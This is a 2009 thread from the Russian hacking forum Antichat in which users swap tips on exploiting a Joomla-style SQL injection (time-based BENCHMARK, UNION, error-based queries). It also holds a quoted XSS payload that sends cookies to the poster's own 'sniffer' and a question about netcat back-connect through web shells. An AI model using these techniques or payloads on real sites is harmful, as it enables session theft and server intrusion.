ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #8451  
Старый 10.08.2009, 11:01
FAQ666
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324

Репутация: 40
По умолчанию

Спасибо. Тогда остается только BENCHMARK()
 
Ответить с цитированием

  #8452  
Старый 10.08.2009, 11:07
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802

Репутация: 380
По умолчанию

Цитата:
Сообщение от FAQ666  
Спасибо. Тогда остается только BENCHMARK()
Ну судя по приведенному запросу можно выполнить union select - зачем BENCHMARK()? Или данные не выводяться?
 
Ответить с цитированием

  #8453  
Старый 10.08.2009, 11:22
FAQ666
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324

Репутация: 40
По умолчанию

Цитата:
Сообщение от PaCo  
Ну судя по приведенному запросу можно выполнить union select - зачем BENCHMARK()? Или данные не выводяться?
Нет вывода)
Компонент популярный запощу в уязвимости)
 
Ответить с цитированием

  #8454  
Старый 10.08.2009, 11:28
Qwazar
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912

Репутация: 4693


По умолчанию

Цитата:
Сообщение от FAQ666  
Спасибо. Тогда остается только BENCHMARK()
Вывода ошибки тоже нет? И страницы совсем никак не отличаются?
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..

Мой блог:http://qwazar.ru/.
 
Ответить с цитированием

  #8455  
Старый 10.08.2009, 11:30
FAQ666
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324

Репутация: 40
По умолчанию

Цитата:
Сообщение от Qwazar  
Вывода ошибки тоже нет? И страницы совсем никак не отличаются?
\
Да)
 
Ответить с цитированием

  #8456  
Старый 10.08.2009, 11:51
PaCo
Постоянный
Регистрация: 06.02.2008
Сообщений: 494
Провел на форуме:
1754802

Репутация: 380
По умолчанию

Судя по коду если гверя вернет error то имеется соотвествуюший вывод ошибки:
PHP код:
if ($database->getErrorNum()) {
                            
trigger_error("DB reports: ".$database->stderr(), E_USER_WARNING);
                        } 
можно попробывать more one row, правда сам не смотрел.
 
Ответить с цитированием

  #8457  
Старый 10.08.2009, 12:15
FAQ666
Познающий
Регистрация: 17.09.2008
Сообщений: 56
Провел на форуме:
587324

Репутация: 40
По умолчанию

Цитата:
Сообщение от PaCo  
Судя по коду если гверя вернет error то имеется соотвествуюший вывод ошибки:
PHP код:
if ($database->getErrorNum()) {
                            
trigger_error("DB reports: ".$database->stderr(), E_USER_WARNING);
                        } 
можно попробывать more one row, правда сам не смотрел.
Напиши запрос полностью а то непоймучто ты предлагаешь)
 
Ответить с цитированием

  #8458  
Старый 10.08.2009, 12:18
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию

Цитата:
Сообщение от FAQ666  
Напиши запрос полностью а то непоймучто ты предлагаешь)
Давай-ка ты сначала нормально разберёшься, а потом будешь постить это в уязвимости джумлы.

Ни кода, ни примера, ни версии, нифига нет. Это не баг, а хрен знает что. Или отредактируй пост нормально, или я его снесу. Разберёшься выложишь
Цитата:
Сообщение от FAQ666  
Вывода нету и не слепая
Это что вообще должно означать по твоему?!

Последний раз редактировалось jokester; 10.08.2009 в 12:21..
 
Ответить с цитированием

  #8459  
Старый 11.08.2009, 00:19
JOHNik
Познающий
Регистрация: 21.04.2009
Сообщений: 58
Провел на форуме:
146521

Репутация: 34
Отправить сообщение для JOHNik с помощью ICQ
По умолчанию

Цитата:
Сообщение от SkyFox  
XSS. Вобщем случайно обнаружил, но так как опыта нет, прошу помощи.

<img src="javascript:img = new Image(); img.src='адрес_к_моему_снифферу ';" >

Сниффер выдаёт жпег пикчу. Запрос проходит успешно, куки отправляются, но картинка не показывается.
Найди в своем сниффере файл config.php и обрати внимание на строчку "$image_filename = "ПУТЬ К КАРТИНКЕ";
 
Ответить с цитированием

  #8460  
Старый 11.08.2009, 01:37
Explоit
Banned
Регистрация: 21.07.2009
Сообщений: 20
Провел на форуме:
26854

Репутация: -11
По умолчанию

Почему на всех моих веб шеллах не открвается порт для конекта нетката?

И подскажите как юзать неткат в режиме backconnect через дедик



ЗЫ один мембер зашол в тему и ущол ((

Последний раз редактировалось Explоit; 11.08.2009 в 01:40..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Форумы 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ